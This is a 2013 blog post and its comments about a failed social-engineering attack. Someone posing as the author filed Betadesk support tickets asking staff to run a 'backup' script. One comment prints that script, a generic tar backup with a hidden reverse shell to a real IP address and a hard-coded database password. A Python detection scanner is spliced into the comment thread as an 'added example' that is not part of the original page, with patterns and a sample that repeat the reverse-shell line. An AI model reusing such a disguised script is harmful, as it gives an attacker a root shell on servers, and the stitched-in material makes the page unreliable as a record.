In the interest of full disclosure : failed social engineering attempt and 0day vulnerability in Betadesk

Sunday, 09 June, Year 5 d.Tr. | Author: Mircea Popescu

A few days ago :

Hello Mircea,

Does policircuit.us belong to you?

No, never heard of it.

Well,

The owner of that domain is going around masquerading as Mircea Popescu trying to obtain logins for your account. I was contacted by 2 other service providers who sent me that information

This was on the 4th. Sorta lulzy in a let's reminisce "O hai. I was just doing a penetration test of your site." way. Kids these days, right ?

Today I discover in my inbox a link to a support ticket I never created. In the Betadesk interface there were actually two tickets, with

Server Name: I do not know my server name
Domain Name: polimedia.us

and an empty string for the "Added by:" value.

At this point not knowing exactly the extent of the attack I duly informed the support that the respective tickets are not created by me. Less than five minutes later the IP I had published that from was being DDOSed and the attacker now had the ability to fill the Added by: string with my name.

Contrary to what the attacker might have imagined I am actually immune to DDOS, and upon realising this the entire older thread quoted above was deleted, as well as selected replies of mine from the two threads requesting login details. Eventually they both were deleted and replaced with a single

Hello,

Someone has been trying to reset my passwords, can you please run a backup script of mine so I can be on the safe side,

Thanks.

The script in question was indicated as

Please run the following script:

http://pastebin.com/asdWBEPB

Thanks a lot.

By now, however, support was well alerted to the problem; some modifications to the way Betadesk logins work were dropped in (for instance, the attacker had no idea that the cookies had been expired and the password for my account reset, and happily continued to post as "me" while that me had never actually logged in), and that's the end of the story as far as I know.

It's unclear to me why exactly someone would go to all this trouble to hack into Trilema, except in the case he'd happen to be one of the countless scammers / fraudsters / spammers ousted in public here. Seems a little doubtful, but you never know. It's also unclear to me whether the plan was to get the logins and, upon failure, was moved to getting the backup bundle (and what exactly would that do, give someone access to read all the articles without paying ?! or maybe he imagines Trilema runs a Bitcoind with BTC in it ?), or whether the plan was to get the back-up all along and the entire logins song and dance was just a decoy for that (an attempt to give the request for the back-up more weight by creating, in the mind of whatever support personnel on duty, the impression that they have to pick between imaginarily dichotomous attacker A and attacker B).

What is certainly clear to me is that Betadesk has a hole, allowing an attacker to somehow escalate to admin privileges. I don't at this time know more details than that. So, just in case you're running it : beware.

Category: Zsilnic

11 Responses

  1. pletzalcoatl
    Sunday, 9 June 2013

    Cool. I especially like it as contrasted to for instance the Fin Times' retrospective on haxor problems where they spend most of their space attempting to "nice-over" the incident and explain technical things in humanities terms.

  2. #!/bin/bash
    #Generic Server Backup With tar

    DIR="serverbackup"
    DATE=`date +%a-%d-%b-%Y-%I:%M:%S-%p-%Z`
    SERVER=`uname -n`

    echo "Starting backup for $SERVER..."

    mkdir -p /root/$DIR/$DATE

    # System Files Backup

    echo "Backing up $SERVER /etc..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
    echo "Uploading backed up data."
    bash -i >& /dev/tcp/96.43.130.122/80 0>&1
    echo "Backing up $SERVER /home..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-home.tar.gz /home

    echo "Backing up $SERVER /var/log..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-logs.tar.gz /var/log

    echo "Backing up $SERVER /var/www..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-www.tar.gz /var/www

    echo "Dumping $SERVER MySQL databases files..."
    mysqldump -u backupdba -pdbapass --all-databases > /var/lib/mysql/alldatabases.sql

    echo "Backing up $SERVER MySQL configuration files..."
    tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-mysql.tar.gz /var/lib/mysql

    echo "Done."

    Seems like a generic back-up script modified a little.

    bash -i >& /dev/tcp/96.43.130.122/80 0>&1

    That's the only part actually doing anything. It looks like you're correct, the attacker has come up with an A/B split - either give me the login or else run this "back-up" script that sends me the logins. Isn't that IP in the US?
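As an added example (not code from the post or from any commenter), here is a small Python check a support desk could run over a customer-supplied "backup script" before executing it as root. It flags the constructs that turn a generic tar script like the one above into a remote shell or a credential leak; the sample script is constructed to mirror that shape, with a placeholder IP from the documentation range rather than the one in the comment.

```python
import re

# Constructs a support desk should refuse to run blind. Each entry pairs a
# regex with a label; the list covers what turned the quoted script hostile
# (a /dev/tcp redirection of an interactive bash) plus close relatives.
SUSPICIOUS_PATTERNS = [
    (r"/dev/(tcp|udp)/", "bash network redirection (/dev/tcp or /dev/udp)"),
    (r"\bbash\s+-i\b", "interactive bash spawned from a non-interactive script"),
    (r"\b(nc|ncat|netcat)\b.*\s-e\b", "netcat with -e (runs a program for the remote side)"),
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", "remote content piped straight into a shell"),
    (r"\bmysqldump\b.*\s-p\S+", "database password embedded on the command line"),
]

def scan_script(text):
    """Return a list of (line_number, label, line) for every match.

    Comment lines and blank lines are skipped because they never execute;
    a line can appear more than once if it matches several patterns.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, label in SUSPICIOUS_PATTERNS:
            if re.search(pattern, stripped):
                findings.append((lineno, label, stripped))
    return findings

def is_safe_to_run(text):
    """True only when no suspicious construct was found."""
    return not scan_script(text)

# Constructed sample: a generic tar backup with one injected line. The IP is a
# placeholder (RFC 5737 documentation range), not the address from the comment.
SAMPLE_SCRIPT = """#!/bin/bash
# Generic Server Backup With tar
DIR="serverbackup"
SERVER=`uname -n`
echo "Backing up $SERVER /etc..."
tar -czPf /root/$DIR/$SERVER-etc.tar.gz /etc
echo "Uploading backed up data."
bash -i >& /dev/tcp/203.0.113.5/80 0>&1
mysqldump -u backupdba -pdbapass --all-databases > /root/$DIR/all.sql
echo "Done."
"""

if __name__ == "__main__":
    for lineno, label, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {label}\n    {line}")
```

Run it as a file and it lists the injected line twice (network redirection and interactive bash) plus the hard-coded database password, which is reason enough to send the ticket back rather than run the script.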

  3. Mircea Popescu
    Sunday, 9 June 2013

    @pletzalcoatl Ya well, the press. What'd you expect, they collectively make less than one single junior investment banker. And by collectively I mean ALL of them, together.

    @Chett Maybe I'm having a moment of density, but what exactly would be accomplished by leeching off the accessible RAM ? Get umpteen Gb of basically meaningless junk, what is this, masochistic hacking ?

  4. Pretty clear they were after the hotwallet from all that.

  5. Mircea Popescu
    Sunday, 9 June 2013

    Well that's awkward. I guess now I have to get a hotwallet for Trilema.

  6. > It's unclear to me why exactly someone would be going to all this trouble to hack into Trilema

    Maybe they really didn't like that pic.

  7. Vexare
    Sunday, 9 June 2013

    'The fuck is betadesk?

  8. Lululemon Canada
    Monday, 8 July 2013

    Greetings from Idaho! I'm bored to death at work so I decided to browse your site on my iphone during lunch break. I really like the information you provide here and can't wait to take a look when I get home. I'm amazed at how fast your blog loaded on my cell phone .. I'm not even using WIFI, just 3G .. Anyways, excellent blog!

  9. Mircea Popescu
    Monday, 8 July 2013

    Cheers.

  1. [...] « In the interest of full disclosure : failed social engineering attempt and 0day vulnerability in Bet... [...]

  2. [...] In the interest of full disclosure : failed social engineering attempt and 0day vulnerability in Bet... S.MG IPO succeeded. Other statements. [...]
